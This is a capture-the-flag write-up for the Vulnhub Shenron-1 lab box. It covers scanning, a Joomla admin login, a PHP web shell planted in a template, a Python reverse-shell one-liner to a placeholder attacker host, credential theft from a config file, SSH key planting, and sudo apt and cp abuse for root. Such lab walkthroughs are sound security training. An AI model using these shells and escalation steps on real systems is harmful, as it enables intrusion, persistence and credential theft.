Vulnhub Shenron-1 write-up
Lets start with the nmap scan to find open ports. Command: sudo nmap -p- 192.168.9.74
Lets detect the service version using targeted nmap scan for open ports.Command: sudo nmap -sV -sC -p22,80 192.168.9.74
Directory enumeration using dirb and gobuster. Both detect the Joomla! is running on port 80.
Apart from joomla, both the dirb and gobuster shows test directory.
When we open the password file it shows message.
As a common practice, always check source code of the page.
We have two places where we can try username and password. SSH and Joomla! login page. I tried it on Joomla! and it worked.
Now next part is to get the shell on the box through Joomla!. There are number of resources available for this, but what I choose is this.
Below are the steps to get reverse shell through Joomla!.
- Login to the Joomla! admin console.
- Go to Extension → Templates →Templates.
3. Select the template to use. I choose Prtotostar.
4. Click on new file and choose the filename of your choice. I used my_shell and don’t forget to choose extension as php. Then click on Create button.
5. You will see below screen.
6. Put below lines as php code. The first line is optional you can skip it. Click on save button.
<?php echo “This will execute command.” ?>
<?php echo shell_exec($_GET[‘cmd’]); ?>
7. Now locate the my_shell.php. In our case it is http://<target-ip>/joomla/templates/protostar/my_shell.php
8. Time to test the RCE. use ?cmd=<command>in URL.
Time for reverse shell.
To get the reverse shell on the system, we can choose suitable payload available on payload all the things reverse shell. I used below payload.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker-ip",attacker-port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
First start the netcat listener on kali machine using command sudo nc -lvnp 443. Then use above payload to get reverse shell.I used payload after URL encoding it.
Jeeny user and password.
As the step of basic enumeration, while checking the files in joomla directory, got the username jenny and its password in /var/www/html/joomla/configuration.php
Switch to user jenny
To get better shell, we can drop a ssh public key in box /home/jenny/.ssh/authorized_keys.
- Generate ssh key pair using ssh-keygen command on attacker machine.
- Copy the id_rsa.pub to senron in /home/jenny/.ssh/id_rsa.pub.
- mv id_rsa.pub to authorized_keys and change its permission to 600.
Command sudo -l shows user jenny can use /usr/bin/cp command as user shenron without password.
To login as user shenton, I download id_rsa.pub from kali machine into temp. Then mv it to authorized_keys and use sudo -u shenron /usr/bin/cp authorized_keys /home/shenron/.ssh/
SSH login as shenron
I used LinPEAS.sh, which shows me a file password.txt in section “Interesting writable files owned by me or writable by everyone (not in Home) (max 500)”
Again sudo -l shows user shenron can run /usr/bin/apt on shenron.
gtfobins shows below options of privilege escalation using apt.
I used the last one “sudo /usr/bin/apt update -o APT::Update::Pre-Invoke::=/bin/sh”.
Root on shenron-1
Thanks all for reading.